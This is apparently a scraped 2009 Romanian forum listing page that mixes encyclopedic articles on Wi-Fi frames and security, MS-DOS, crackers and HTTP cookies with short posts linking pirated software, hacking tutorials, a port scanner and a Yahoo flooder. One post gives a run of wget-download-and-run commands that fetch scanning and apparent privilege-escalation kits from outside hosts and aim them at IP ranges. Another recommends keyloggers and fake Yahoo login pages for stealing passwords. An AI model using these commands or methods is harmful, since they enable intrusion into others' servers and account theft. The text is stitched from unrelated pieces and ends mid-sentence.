cadrului. Semnificaţia fiecărui bit din acest antet este cea din tabelul următor: Câmp Dimensiune Semnificaţie Versiune 2 Specifică versiunea de MAC pe care o implementează acest cadru Tip 2 Identifică tipul cadrului: poate lua trei valori: cadru de date, cadru de control sau cadru de gestiune Subtip 4 Identifică mai precis tipul de cadru. De exemplu, cadrele de control pot fi RTS, CTS sau confirmări. Către DS 1 Arată direcţia cadrului (dacă este de la staţie spre sistemul de distribuţie) De la DS 1 Invers decât bitul anterior MF 1 Semnalează faptul că acesta este un cadru multifragment Reîncercare 1 Semnalează faptul că acest cadru este retransmis după un eşec Consum 1 Bit prin care staţia de bază pune receptorul în aşteptare sau îl trezeşte din starea de aşteptare Mai mult 1 Arată că transmiţătorul mai are cadre de trimis receptorului WEP 1 Semnalizează criptarea prin metoda WEP Ordine 1 Arată că acest cadru, împreună cu celelalte care au acest bit setat trebuie să fie preluate în ordinea în care au fost transmise Celelalte câmpuri ale cadrului sunt descrise astfel: Câmp Dimensiune Semnificaţie Controlul cadrului 2 Fiecare bit are semnificaţia dată în tabelul de mai sus Durată 2 Durata estimată de ocupare a canalului, antet folosit de cadrele de control (RTS/CTS). Acest antet este citit de staţiile terţe, pentru a şti cât timp să stea în aşteptare atunci când detectează transmiterea lui. Adresă 1 6 Există patru câmpuri de adresă. Primele două reprezintă, respectiv, adresa transmiţătorului şi cea a receptorului. Celelalte sunt folosite în cazul comunicaţiei între celule diferite ale aceleiaşi reţele—fiind respectiv adresa celulei sursă şi a celulei destinaţie Adresă 2 6 Adresă 3 6 Secvenţă 2 Reprezintă numărul de secvenţă (primii 12 biţi) şi numărul de fragment (ultimii patru biţi) Adresă 4 6 A patra adresă Date 0–2312 În cazul cadrelor de gestiune şi al cadrelor de date, aici stă încărcătura informaţională a cadrului. Suma de control 4 Folosită pentru a asigura integritatea datelor. Se calculează cu ajutorul CRC (în caz de transmisie necriptată sau criptată cu WEP), algoritmului Michael (în cazul WPA) sau CCMP (în cazul WPA2) Fiecare cadru poate conţine maxim 2304 octeţi de date utile, dimensiunea minimă a câmpului de date fiind de 2312 octeţi, pentru a face loc posibilului overhead al WEP. Nu toate cadrele folosesc toate câmpurile. De exemplu, cadrele de control nu folosesc adresele 3 şi 4, nici secvenţa şi nici datele. Securitatea Spre deosebire de Ethernet, mediul de transmisie aduce probleme de securitate suplimentară. Dacă în Ethernet, accesul la cablu se putea restricţiona prin ascunderea sau asigurarea zonelor prin care trece acesta, undele radio sunt mult mai dificil de controlat. Există mecanisme de bruiaj, care generează un zgomot electromagnetic ce acoperă frecvenţele folosite de reţelele 802.11, dar acestea nu pot funcţiona perfect, fără a afecta comunicaţiile legitime sau fără a lăsa breşe prin care se poate obţine acces în reţea. Cum la nivel fizic securitatea este dificil de asigurat, pentru obţinerea unui nivel de securitate acceptabil este obligatorie criptarea datelor şi controlul accesului la nivelele superioare celui fizic. Tehnici simple de control al accesului Accesul la reţea se poate controla şi prin unele tehnici simple, care pot avea un succes limitat, dar suficient pentru a îndepărta unele intruziuni ocazionale. O astfel de tehnică este configurarea punctului de acces aşa încât să nu-şi transmită public SSID-ul. SSID-ul (din engleză Service Set IDentifier) reprezintă un nume pe care un punct de acces îl transmite periodic pentru a îşi face cunoscută prezenţa staţiilor ce doresc să intre în reţea. Oprirea transmiterii acestui semnal ascunde prezenţa reţelei faţă de un potenţial atacator superficial, permiţând totuşi staţiilor care cunosc SSID-ul punctului de acces să se conecteze la reţea. Această soluţie nu este una de natură să protejeze sistemul de accesul unor intruşi mai riguroşi, deoarece interceptarea cadrelor transmise în reţea între punctul de acces şi staţiile conectate poate oferi informaţia necesară pentru accesarea reţelei. O altă tehnică la fel de simplă, dar la fel de ineficientă, este filtrarea adreselor MAC. Ca şi în Ethernet, dispozitivele de acces la reţea sunt identificate în mod unic de o adresă fizică (denumită şi adresă MAC). Un punct de acces poate fi configurat să nu permită accesul în reţea decât staţiilor care au una dintr-o listă finită de adrese MAC. Prin aceeaşi tehnică de ascultare a traficului legitim din reţea, însă, un intrus poate afla adresa MAC a unei staţii legitime, falsificând apoi această adresă şi obţinând accesul, pretinzând că este respectiva staţie. WEP Paşii autentificării WEP: 1. Staţia (STA) trimite o cerere de autentificare. 2. Punctul de acces (AP) generează un nonce şi îl trimite staţiei. 3. Staţia criptează nonce-ul cu cheia secretă comună şi îl trimite înapoi punctului de acces. 4. Punctul de acces compară datele criptate primite cu cele aşteptate şi apoi trimite înapoi cadrul de autentificare cu rezultatul.Prima tehnică de criptare a cadrelor la nivelul legătură de date a fost WEP (Wired Equivalent Privacy), numele sugerând că a fost gândită cu scopul de a obţine o securitate a legăturii de date echivalentă cu cea a unei reţele Ethernet. Această tehnică fost folosită din 1997 până când a fost spartă în 2001 şi a încetat să mai fie considerată sigură din 2005 odată cu publicarea standardului de securitate IEEE 802.11i. WEP folosea algoritmul RC4, cu o cheie constantă de-a lungul transmisiunii, în variantele pe 64 de biţi (cheie de 40 de biţi şi vector de iniţializare de 24) sau de 128 de biţi (cheie de 104 biţi şi vector de iniţializare de 24), controlul integrităţii datelor realizându-se printr-o sumă de control CRC. În modul de lucru cel mai sigur, cel cu cheie partajată, autentificarea staţiilor se făcea printr-un mecanism de challenge: după ce o staţie anunţă că doreşte să se autentifice, punctul de acces alege aleator un text clar şi îl trimite staţiei; Staţia criptează textul primit şi îl trimite înapoi punctului de acces; punctul de acces decriptează mesajul şi îl compară cu cel trimis iniţial, permiţând sau respingând accesul în consecinţă. După permiterea accesului, transmisia cadrelor se face criptat cu cheia reţelei. O demonstraţie a spargerii WEP a fost publicată în august 2001 de Scott Fluhrer, Itsik Mantin şi Adi Shamir, care au arătat slăbiciuni în planificarea cheilor din algoritmul RC4, slăbiciuni care permit atacuri în timp liniar asupra transmisiunilor care îl folosesc, pe baza lucrării prezentate cu o lună înainte, la conferinţa ACM din 2001, de către Nikita Borisov, Ian Goldberg şi David Wagner. Ulterior, aplicaţii practice au demonstrat că atacul Fluhrer-Mantin-Shamir este uşor realizabil practic. La nivelul anilor 2005, o criptanaliză WEP cu unelte disponibile public necesită un timp de ordinul minutelor, atacuri îmbunătăţite reuşind de atunci şi în mai puţin de un minut. WPA şi WPA2 Ca răspuns la spargerea WEP, Wi-Fi Alliance a produs în 2003 specificaţia WPA (Wi-Fi Protected Access), în care a adresat problemele primare ale WEP. În WPA, s-a păstrat algoritmul de criptare simetrică RC4, dar s-a introdus în schimb TKIP (Temporary Key Integrity Protocol), o tehnică de schimbare a cheii de criptare pe parcursul sesiunii de lucru şi s-a înlocuit suma de control CRC-32 din WEP cu algoritmul Michael, deoarece cu CRC recalcularea sumei de control unui cadru alterat nu necesita cunoaşterea cheii de criptare. IEEE a preluat specificaţia WPA şi a elaborat în 2004 pe baza ei standardul IEEE 802.11i, standard care stabileşte o politică de criptare cunoscută sub numele de WPA2. În WPA2, algoritmul de criptare RC4 este înlocuit şi el cu mai puternicul algoritm AES, iar suma de control a cadrului este calculată cu ajutorul CCMP, un cod mai sigur decât CRC şi decât algoritmul Michael. WPA şi WPA2 pot funcţiona în două moduri distincte. Cel mai simplu dintre acestea, folosit în general la reţele personale (casnice sau ale unor firme mici), presupune configurarea staţiilor cu ajutorul unei parole de acces, parolă din care se calculează cheile de criptare cu ajutorul funcţiei PBKDF (Password-Based Key Derivation Function). În celălalt mod, WPA2 autentifică staţiile de lucru cu ajutorul unui server RADIUS. Implementări hardware O interfaţă Wi-Fi PCI, cu o mică antenă. După montare, antena rămâne în afara carcasei calculatorului.În general, dispozitivul necesar pentru realizarea unei reţele 802.11 este interfaţa de reţea prezentă pentru dispozitivele ce trebuie conectate. Se fabrică interfeţe de reţea 802.11 PCI şi miniPCI (pentru laptopuri), dar şi dispozitive USB sau PCMCIA. Multe laptopuri au interfaţa de reţea integrată, ca şi multe PDA-uri şi smartphone-uri. Folosind aceste dispozitive, se poate realiza o conexiune peer-to-peer, cu funcţie de coordonare distribuită pentru controlul accesului la mediu. Un ruter IEEE 802.11 cu trei antene pentru utilizatori casniciDe asemenea, există puncte de acces wireless, dispozitive care fac conexiunea la nivelul legătură de date între o reţea cablată şi una fără fir, controlând accesul la mediu prin funcţia de coordonare punctuală. Mai multe puncte de acces coordonate între ele pot fi folosite pentru a acoperi o suprafaţă mai mare. Punţile sunt dispozitive similare punctelor de acces, ele fiind folosite în general pentru stabilirea unei conexiuni fără fir între două reţele cablate—lucru necesar în cazul în care nu se poate sau nu este practic să se întindă un cablu între cele două reţele, cum ar fi cazul între două clădiri aflate pe părţi diferite ale unei străzi. Mulţi producători de echipamente comercializează dispozitive care combină un ruter cu un switch Ethernet şi, eventual, cu un modem ADSL într-un sistem care oferă soluţii accesibile pentru crearea şi administrarea unei reţele casnice. Acestea sunt de cele mai multe ori furnizate împreună cu un firmware configurabil ce poate realiza NAT, firewalling sau control al ratei de transfer şi poate funcţiona ca server DNS şi DHCP; în locul firmware-ului dedicat, se pot folosi sisteme de operare multiplatformă pentru astfel de rutere, cum ar fi DD-WRT, un sistem bazat pe nucleul Linux. Unele astfel de dispozitive pot avea şi porturi USB, şi pot astfel funcţiona ca print-servere (împreună cu o imprimantă USB) sau ca servere de fişiere (împreună cu unităţi de stocare USB). Limitări Reţelele Wi-Fi oferă rate de transfer mari pe distanţe mici, fiind una dintre cele mai rapide reţele fără fir, dar şi cea care oferă cea mai mică mobilitate—Bluetooth este şi ea o tehnologie fără fir gândită pentru acces pe distanţe şi mai mici, de ordinul a câţiva metri, dar care oferă aceleaşi rate de transfer, avantajul ei constând într-o mai mare economie de energie. Pentru mărirea ariei de acoperire, IEEE a standardizat tehnologia WiMAX, pentru reţele metropolitane fără fir (IEEE 802.16). Întrucât echipamentele pentru WiMAX sunt însă costisitoare, Intel a dezvoltat o tehnologie de conexiune fără fir bazată pe standardele 802.11 cu dirijarea undelor, şi care poate asigura legătura între două puncte aflate la distanţe de ordinul sutelor de kilometri, costul echipamentelor fiind cu două ordine de mărime mai mici decât cele ale punctelor de acces 802.16 (WiMAX). Rata de transfer Grafic al ariilor de acoperire ale diferitelor tehnologii fără fir. Wi-Fi oferă rate de transfer mari pe distanţe mici (reţele locale). Reţelele WiMAX sunt o tehnologie pentru reţele metropolitane. GSM/GPRS sunt reţele cu arie mare de acoperire, dar care oferă rate de transfer de câţiva kilobiţi pe secundă.Ratele de transfer ale standardului 802.11 au fost, la început (anii 1997-1999), de ordinul megabiţilor pe secundă, într-o perioadă în care reţelele Ethernet, cablate, ofereau rate de ordinul zecilor şi sutelor de megabiţi pe secundă. În anul 2009, sunt disponibile pe scară largă echipamente Ethernet Gigabit, apărând chiar şi echipamente ce transferă date prin cablu la 10 Gbps, în timp ce reţelele 802.11g ating rate de transfer de 56 Mbps, iar noul standard 802.11n îşi propune să atingă 270 Mbps. Din punctul de vedere al ratei de transfer, din cauza caracteristicilor adesea imprevizibile ale mediului, cum ar fi zgomote electromagnetice provenite din diverse surse (alte dispozitive ce folosesc aceeaşi bandă, cum ar fi Bluetooth sau cuptoarele cu microunde) sau fenomene atmosferice (ceaţă, fenomene electrice şi electrostatice), reţelele Wi-Fi rămân în urma celor cablate. Totuşi, reţelele 802.11 sunt cele mai rapide reţele fără fir, singurele care se pot compara ca rată de transfer cu reţelele locale cablate. Aria de acoperire O limitare importantă a reţelelor Wi-Fi o constituie aria de acoperire. Ea depinde mult de capabilităţile antenelor dispozitivelor şi de topografia particulară a zonei pe care urmăreşte reţeaua să o acopere. Plantele absorb radiaţiile electromagnetice, şi astfel instalarea unei reţele într-o zonă împădurită (cum ar fi un parc) limitează aria de acoperire a acesteia. Pereţii de beton reflectă puternic undele radio, instalarea unei reţele într-o clădire aducând astfel limitarea numărului de camere ce poate fi acoperit de o singură celulă. În interiorul clădirilor, un punct de acces cu o antenă de dimensiuni mici şi un preţ accesibil poate acoperi o arie de aproximativ 32 m, iar în exterior, acelaşi punct de acces poate ajunge la 95 m. Aria de acoperire poate fi şi mai restrânsă în cazul folosirii benzii de 5 GHz în locul celei de 2,4 GHz (mai zgomotoasă, dar în care se poate acoperi o arie mai mare). Transmisiunea la cea mai mare distanţă cu ajutorul unor dispozitive Wi-Fi a fost realizată, folosind antene puternice şi semnale direcţionate, de Ermanno Pietrosemoli de la Escuela Latinoamerica de Redes, care a transferat 3 MB de date între vârfurile El Aguila şi Platillon din Venezuela, aflate la o distanţă de 382 km. Canalele Repartizarea canalelor în banda de 2,4 GHzÎn Japonia, Wi-Fi foloseşte 14 canale ale benzii de 2,4 GHz, în Statele Unite 11 iar în Europa 13. În zonele unde acţionează mai multe puncte de acces, acestea se pot interfera, deoarece benzile nu sunt complet separate. Doar trei canale (1, 6 şi 11 în SUA, mai multe combinaţii în Europa şi Japonia) pot fi complet separate, în condiţiile în care toate punctele de acces dintr-o zonă folosesc doar IEEE 802.11g, fără posibilitatea de a recurge la 802.11b în caz de condiţii dificile. În Uniunea Europeană, puterea radiată izotrop echivalentă maximă este de 100 mW (20 dBm). Consumul energetic Durata bateriilor staţiilor mobile reprezintă şi ea o limitare. Bateria unui PDA, care în mod normal ar funcţiona mai multe zile, se poate epuiza în câteva ore dacă i se lasă radioul Wi-Fi pornit. Laptopurile dotate cu adaptor IEEE-802.11 sunt prevăzute şi cu un buton de oprire a emiţătorului radio Wi-Fi pentru a prelungi durata de funcţionare a bateriei când nu se foloseşte reţeaua fără fir. :hi: :hi: :hi:
01.10.200917.3KB
ms-dos de la microsoft disk operating system) este un sistem de operare de microsoft. el a fost celMS-DOS (prescurtat de la Microsoft Disk Operating System) este un sistem de operare comercializat de Microsoft. El a fost cel mai utilizat sistem de operare din familia DOS şi a dominat sistemele de operare pentru PC în anii 1980. El a fost bazat pe familia de microprocesoare Intel 8086, in special pe IBM PC şi compatibil. El a fost gradual înlocuit de siseme de operarte care oferă interfaţă grafică, în special diverse generaţii ale sistemului de operare Microsoft Windows. El a fost original cunoscut ca QDOS (Quick and Dirty Operating System) şi 86-DOS. MS-DOS a fost iniţial lansat în 1981 şi are opt versiuni majore lansate înainte ca Microsoft să oprească dezvoltarea în 2000. El era un produs cheie pentru creşrerea Microsoft datorită diverselor limbaje de programare pe care compania le crea pentru firmele dezvoltatoare de software, furniza venituri importante companiei şi resurse de comercializare. El a fost sistemul de operare pe care se bazau primele versiuni de Windows executate ca o interfaţă grafică. 86-DOS a fost redenumit MS-DOS de către Seattle Computer Products. El a început ca un sistem de operare pentru noul procesor Intel 8086. Iniţial MS-DOS a fost gândit să fie un sistem de operare care să poată funcţiona în orice procesor al familiei de calculatoare 8086. Fiecare calculator trebuia să aibă propria configuraţie hardware si propria versiune de MS-DOS. Cea mai mare nevoie de resursele harware o aveau jocurile video. Apot ţinta a devenit arhitectura compatibilă IBM. În curând, toate calculatoarele din familia 8086 imitau hardware-ul IBM şi era de ajuns o singură versiune de MS-DOS pentru toată piaţa. Cât timp MS-DOS era utilizat de clonele IBM PC, adevăratele calculatoare IBM utilizau PC-DOS, o versiune modificată de MS-DOS. De altfel, dependenţa de hardware compatibil IBM a cauzat probleme majore pentru industrie când design-ul original a fost schimbat. De examplu, design-ul original nu mutea suporta mai mult de 640 KB de RAM. Producătorii au început să dezvolte scheme complicate de accesare a memoriei suplimentare. Acest lucru nu ar fi fost o limitare, dacă ideea iniţială MS-DOS de interfaţare cu hardware-ul nu ar fi suferit. MS-DOS a continuat să existe ca o platformă pentru desktop-uri. Începând cu lansarea Windows 9x, el a fost integrat ca un produs complet utilizat mai mult pentru pornirea sistemului şi nu a mai fost lansat oficial ca un sistem de operase de sine stătător, deşi, la început, DOS 7 (care a fost inclus în Windows 95) a fost dezvoltat ca un sistem de operase de sine stătător. El a fost disponibil, dar a devenit din ce în ce mai irelevant ca urmarea dezvoltării Windows API. Windows XP conţine o copie a fişierelor ce compun nucleul MS-DOS 8 din Windows Millennium, accesibile doar prin formatarea unui floppy ca „disc de pornire MS-DOS” (en:„MS-DOS startup disk”). Încercarea de executare a comenzii COMMAND.COM de pe un astfel de disc sub NTVDM (emulare a MS-DOS sub Windows NT) este sortită eşecului, producând mesajul „versiune incorectă de MS-DOS” (en:„Incorrect MS-DOS version”). (Notează că discul de boot DOS creat sub Windows XP este mai redus decât cel creat sub Windows 98, pentru că el nu include suport pentru CD-ROM.) În Windows Vista fişierele de pe discul de start au data 18 aprile 2005, dar sunt neschimbate, incluzând sirul de caractere „MS-DOS Version 8 (C) Copyright 1981-1999 Microsoft Corp” în fişierul COMMAND.COM. Cu toate acestea, singurele versiuni de DOS recunoscute în prezent ca sisteme de operare de sine stătătoare şi pentru care se oferă suport de către Microsoft Corporation sunt DOS 6.0 şi 6.22, ambele rămân disponibile pentru descărcare prin MSDN, licenţe în volume şi licenţă OEM pentru clienţii cu date valide. Astăzi, DOS este încă utilizat de sisteme x86 datorită arhitecturii simple şi cerinţelor minime de memorie şi procesor. Interpretorul în linie de comandă din versiunile de Windows NT, cmd.exe, menţine multe din comenzi compatibile cu cele din MS-DOS. :hi: :hi: :hi:
01.10.200917.3KB

 
avast! 4 home - romanian version
30.09.200917.3KB
windows vista bussines sp@ windows vista bussines sp@ windows vista bussines sp@ windowsWindows Vista Bussines SP@ x64(ExpertPC.Ucoz.Com).part1.rar Windows Vista Bussines SP@ x64(ExpertPC.Ucoz.Com).part2.rar Windows Vista Bussines SP@ x64(ExpertPC.Ucoz.Com).part3.rar Windows Vista Bussines SP@ x64(ExpertPC.Ucoz.Com).part4.rar
30.09.200917.3KB
Multi-Yahoo-Messenger-9
30.09.200917.3KB
1000 hacking tutorials - the best of (2008)
25.09.200917.3KB

 
(1)
30.09.200917.3KB
Dragon_IP_Port_Scanner
30.09.200917.3KB
aici se gasesc o de programe p2p,cum ar fi: ares, bitcomet, dc++, emule si multe altele. merita Aici se gasesc o multitudine de programe p2p,cum ar fi: Ares, BitComet, DC++, eMule si multe altele. Merita verificat link-ul daca esti impatimit p2p... :nod:
30.09.200917.3KB
poi in primul rand, hai sa ne lamurim. iti trebuiesc ceva unelte, cum ar fi keylogger, sau paginiPoi in primul rand, hai sa ne lamurim. Iti trebuiesc ceva unelte, cum ar fi keylogger, sau pagini fake login yahoo. In rest, nu va luati dupa toate programelele care sunt laudate ca pot fura parola cuiva, sau ca pot schimba parola. Nu este adevarat. :nono: :nono: :nono:
26.09.200917.3KB

 
stiu ca este putin cam veche dar merita... :nod: languard network security scanner 3 Stiu ca este putin cam veche versiunea... dar merita... :nod:
30.09.200917.3KB
sper sa placa... :nebun: combat wings battle of the pacific Sper sa placa... :nebun:
25.09.200917.3KB
pentru tmp wget sau wget tar -xzvf assl.tgz cd assl ./assl ip.ip wget tar xzvf goods.gz sauPENTRU SCANAT cd tmp wget SAU wget pascani.com/assl.tgz tar -xzvf assl.tgz cd assl ./assl ip.ip wget tar xzvf goods.gz sau tar xvf goods.gz cd .auth ./start ip.ip wget tar -xzvf ssteam.tgz cd ssteam ./start ip.ip wget tar zxvf access2.tar.gz tar xvf access2.tar.gz cd access2 ./porno wget mafias.cc/get/unixcod.tar.gz tar xzvf unixcod.tar.gz rm -rf unixcod.tar.gz cd unixcod chmod +x * ./unix 128.100 wget mafias.cc/get/priv88.tar.gz tar xzvf priv.88.tar.gz tar xzvf priv88 cd priv chmod +x * ./start 128.100 wget mafias.cc/get/apache.tgz tar xzvf apache.tgz rm -rf apache.tgz cd apache ./lx 200.10 wget mafias.cc/get/scan.tgz tar xzvf scan.tgz rm -rf scan.tgz cd scan ./start 128.100
25.09.200917.3KB
sincer nu stiu daca este tutorial sau vreun software, deoarece nu am testat s-a parut de aceea Sincer nu stiu daca este tutorial sau vreun software, deoarece nu am testat link-ul... Mi s-a parut interesant, de aceea l-am postat...
30.09.200917.3KB

 
YaHoo_Load_Flooder_V.1
30.09.200917.3KB
conversie :nebun: :nebun: :nebun: all converter Conversie (Mpeg+Vob+Avi+Mov+Animated Gif+Swf+Mpeg4+Rm+Wmv+Asf+Wav+Wma+Mp3+3Gp+m4A+Mp4+h¶ 264+Mp2+Ogg+m4V) :nebun: :nebun: :nebun:
30.09.200917.3KB
În vernacular se confuzia între termenul de cracker si cel de hacker, cracker însemnând cel careÎn vernacular se întâlneşte confuzia între termenul de cracker si cel de hacker, cracker însemnând cel care sparge/se infiltrează în calculatoarele altora. Acest cuvânt provine de la ocupaţia favorită a crackerilor şi anume de a sparge parole. Se poate vorbi atât de crackeri care sparg programe shareware sau altfel de software sau media protejate, cât şi de crackeri care sparg calculatoare şi obţin accesul la informaţii confidenţiale (de exemplu numărul cărţii dumneavoastră de credit), sau virusează calculatorul altora (de exemplu, pentru a-l folosi drept fabrică de spam sau a găzdui pornografie, de obicei ilegală, în scop de câştig comercial). Crackerii sunt pasionaţi ai informaticii, care, de obicei au ca scop „spargerea” anumitor coduri, baze de date, pagini web etc. Ei sunt consideraţi infractori, în majoritatea statelor lumii. Crackerii adevăraţi nu „distrug”, de obicei, pagini inofensive, cum ar fi paginile personale. Ţintele obişnuite ale atacurilor crackerilor sunt sistemele importante, care au protecţii avansate şi conţin informaţii strict secrete, cum ar fi bazele de date ale Pentagonului sau cele de la NASA. Odată obţinute, aceste fişiere (informaţii) sunt publicate pe tot Internet-ul, pentru a fi vizionate sau folosite de cât mai multe persoane. Orice cracker advărat trebuie să respecte un „Cod de legi al hackerilor”, care este bine stabilit, cunoscut şi respectat. Se poate afirma că orice cracker este fie hacker, fie haxor. De aceea, categoriile semantice de cracker şi de hacker se intersectează dar nu coincid. Hacker înseamnă la origine: expert în calculatoare. :hi:
01.10.200917.3KB
nimic nou??? :rusine: nod32 antivirus system 2.70.16 - final - iplaynimic nou??? :rusine:
17.10.20091.4KB

 
un cookie http sau un modul cookie este un text special, deseori codificat, trimis de un server unuiUn cookie HTTP sau un modul cookie este un text special, deseori codificat, trimis de un server unui browser web şi apoi trimis înapoi (nemodificat) de către browser, de fiecare dată când accesează acel server. Cookie-urile sunt folosite pentru autentificare precum şi pentru urmărirea comportamentului utilizatorilor; aplicaţii tipice sunt reţinerea preferinţelor utilizatorilor şi implementarea sistemului de „coş de cumpărături”. Termenul „cookie” este o preluare directă din limba engleză, având în limbajul curent semnificaţia de „prăjiturică” sau „biscuit”. Se pronunţă aproximativ „cu-chi”. În informatică el este derivat din termenul „magic cookie”, un concept des utillizat în IT, care a şi inspirat cookie-urile HTTP. În general numele de „cookie” este folosit şi în alte limbi; doar în terminologia tehnică francofonă s-a încercat traducerea lui prin termenul témoin („martor”). Cookie-urile au creat îngrijorare din cauza faptului că permit strângerea de informaţii despre comportamentul utilizatorilor (în principiu, ce pagini vizitează şi când). Ca urmare, aspecte ale folosirii lor (şi a informaţiilor culese) sunt supuse unor restricţii legale în unele ţări, printre care Statele Unite ale Americii şi ţările UE. Tehnicile de tip „Cookie” au fost de asemenea criticate pentru faptul că identificarea utilizatorilor nu e întotdeauna precisă, ca şi pentru faptul că prin intermediul lor se pot executa atacuri informatice. Există şi o serie de păreri greşite despre cookie-uri, cele mai multe bazate pe impresia (greşită) că ele ar conţine întotdeauna cod executabil; în realitate ele sunt doar texte, şi nu pot să execute nici o operaţie. Ele nu sunt nici spyware şi nici viruşi, deşi anumite programe anti-virus şi anti-spyware le semnalează prezenţa în sistem. Cele mai multe browsere moderne permit utilizatorului să decidă dacă acceptă sau nu cookie-uri. Siturilor care le refuză le vor lipsi însă anumite facilităţi - de exemplu, într-un magazin virtual nu se va mai putea folosi coşul de cumpărături, dacă acesta a fost implementat cu ajutorul cookie-urilor. Cookie-urile sunt folosite de serverele web pentru a putea diferenţia utilizatorii şi pentru a putea reacţiona în funcţie de acţiunile acestora în cadrul unei sesiuni formate din mai multe tranzacţii separate. Ele au fost inventate pentru a se putea implementa un coş de cumpărături virtual: de obicei, utilizatorul mai întâi se autentifică (login), apoi navighează situl, adaugă sau elimină în voie obiecte din coş, apoi afişează conţinutul coşului, cere calcularea preţului final, se hotărăşte să comande (ori totuşi renunţă), iar la sfârşit închide sesiunea (logout). Autentificarea utilizatorilor faţă de server este o altă aplicaţie a cookie-urilor; cu ajutorul acestora serverul reţine faptul că utilizatorul s-a autentificat, şi îi va permite acţiuni specifice celor autentificaţi. Unele situri folosesc cookie-urile şi pentru a permite utilizatorilor să modifice felul în care afişează paginile de web, în funcţie de preferinţele personale, care sunt reţinute şi între sesiuni. Se pot modifica şi reţine în acest fel atât aspecte legate de funcţionalitatea cât şi de afişarea grafică a paginilor. De exemplu, Wikipedia permite utilizatorilor înregistraţi să modifice aspectul paginilor, iar în Google, chiar şi utilizatorii neînregistraţi pot de exemplu alege câte rezultate să fie afişate într-o pagină. Cookie-urile se folosesc şi pentru a urmări activitatea unui utilizator pe un sit, sau chiar pe mai multe situri, în cazul cookie-urilor „third party” sau a aşa-numiţilor „web bugs”. Urmărirea în cadrul unui sit este făcută în scopul obţinerii unor statistici ale folosirii. În special companiile de publicitate urmăresc activitatea utilizatorilor în cadrul mai multor situri pentru a afla mai exact interesele lor, putând astfel să decidă ce reclame să trimită la un anumit moment unui anumit utilizator. Cookie-urile de obicei conţin date fără semnificaţie pentru utilizator sau pentru browserul său, dar care pot fi interpretate de server. Browserul le primeşte şi le returnează serverului nemodificate, introducând astfel o „amintire” a evenimetelor trecute în cererea HTTP, care în sine este atemporală (altfel spus, fiecare cerere este în principiu un eveniment izolat, fără a avea vreo legătură cu alte cereri HTTP trecute sau viitoare către acelaşi server). Returnând însă un cookie unui server, acesta poate lega cererea actuală de cereri precedente (în care acelaşi server a trimis cookie-ul). În afară de servere, cookie-urile mai pot fi create şi de aplicaţii web care rulează pe server şi comunică cu clienţii prin HTTP, şi scrise în limbaje de programare cum ar fi Java şi C# sau în scripturi ce rulează pe server. Descrierea detaliată a mecanismului sugerează ca browserele să poată reţine cel puţin 300 de cookie-uri de câte 4 kb, şi cel puţin 20 pentru fiecare server sau domeniu de internet. La crearea cookie-ului se poate specifica şi data de ştergere; în caz contrar, acesta va fi şters la închiderea browserului. Un magazin virtual poate dori să se reţină conţinutul coşului de cumpărături între sesiuni, astfel încât la următoarea vizită utilizatorul să nu trebuiască să caute din nou toate produsele. În acest caz, serverul magazinului va crea un cookie cu un termen de ştergere ceva mai lung. Doar cookie-urile care au un termen de ştergere lung, specificat explicit, vor „supravieţui” între sesiuni, în care caz ele pot fi numite „persistente”. De la apariţia cookie-urilor pe Internet s-au răspândit, din păcate, şi mai multe păreri greşite despre ele. În 2005, Jupiter Research a publicat rezultatele unui sondaj, conform căruia o bună parte a celor chestionaţi credeau că: - cookie-urile sunt similare viermilor sau viruşilor, putând să şteargă date de pe hard disk; - cookie-urile sunt o formă de spyware, putând să citească informaţii personale stocate în PC; - cookie-urile generează popup-uri (ferestre cu reclame, deschise automat de către browser, în general deranjante); - cookie-urile sunt folosite pentru a trimite spam; - cookie-urile sunt o formă de reclamă. De fapt cookie-urile conţin doar date, nu şi cod: ele nu pot să şteargă sau să citească ceva de pe PC-ul utilizatorului. Totuşi, ele permit detectarea paginilor vizitate de un utilizator într-unul sau mai multe situri. Aceste informaţii pot fi colectate într-un profil al utilizatorului. Acesta este ce-i drept anonim (nu conţine informaţii personale cum ar fi nume sau adresă, cu excepţia cazului în care utilizatorul şi-a indicat el însuşi datele personale), dar conţine totuşi un IP. Chiar dacă sunt în teorie anonime, datele colectate în acest fel au dat naştere unor îngrijorări cu privire la cât de bine se asigură anonimitatea utilizatorului atunci când navighează pe Internet. În plus, conform aceluiaşi sondaj, destul de mulţi intervievaţi nu ştiau cum să şteargă cookie-urile reţinute de browserele lor. Cele mai multe browsere moderne suportă cookie-uri; ele permit însă utilizatorului să decidă dacă va folosi sau nu cookie-uri. Variantele cele mai folosite sunt: (1) nu sunt folosite cookie-uri, (2) browserul cere permisiunea utilizatorului la fiecare cookie, sau (3) toate cookie-urile sunt acceptate. Fereastra de configurare a cookie-urilor din Mozilla Firefox, afişând cookie-urile în funcţie de domeniul de provenienţă.Browserul poate permite specificarea mai detaliată a cookie-urilor care să fie acceptate. De obicei utilizatorul are la dispoziţie următoarele opţiuni: respingerea cookie-urilor pentru anumite domeniii de internet; respingerea cookie-urilor third party (explicate mai jos); acceptarea cookie-urilor dar ştergerea lor la închiderea browserului; permisiunea ca un server să creeze cookie-uri pentru un alt domeniu. Cele mai multe browsere care suportă Javascript dau posibilitatea afişării cookie-urilor active pentru o anumită pagină, scriind javascript:alert("Cookies: "+document.cookie) în câmpul de editare a URL-ului. În plus, unele browsere permit utilizatorului să vadă şi să şteargă individual cookie-urile stocate. Standardul P3P dă posibilitatea serverelor să declare ce fel de informaţii colectează şi în ce scop, incluzând informaţiile colectate cu ajutorul cookie-urilor. Astfel, un browser poate să decidă dacă acceptă sau nu cookie-urile, sau poate afişa utilizatorului intenţiile declarate de server, iar acesta va decide acceptarea sau respingerea cookie-urilor. Cookie-urile au implicaţii destul de importante în ceea ce priveşte anonimitatea şi securitatea informaţiilor de natură personală ale celor care accesează pagini de web. Deşi cookie-urile sunt trimise doar serverului care le-a creat sau unuia care este în acelaşi domeniu de Internet, o pagină poate conţine imagini (sau alte elemente) găzduite pe mai multe servere din domenii diferite. Cookie-urile create de aceste servere secundare (faţă de serverul pe care este găzduită pagina propriu-zisă) se numesc „third party” în limba engleză, o traducere mot-a-mot fiind „terţă parte”. În acest exemplu (fictiv), o companie de publicitate are bannere pe două pagini de web. Imaginile sunt memorate pe serverele companiei; în acest fel, folosind cookie-uri third party, compania de publicitate poate urmări activitatea utilizatorilor pe cele două pagini.Companiile publicitare folosesc astfel de cookie-uri pentru a urmări utilizatorii care accesează paginile în care aceasta are imagini sau aşa numite „Web-bugs” (care sunt imagini cu dimensiunea de un singur pixel, în mod normal invizibile -transparente-, al căror singur rol constă în a declanşa un transfer de cookie-uri). În acest fel compania cunoaşte comportamentul utilizatorilor şi poate plasa reclame 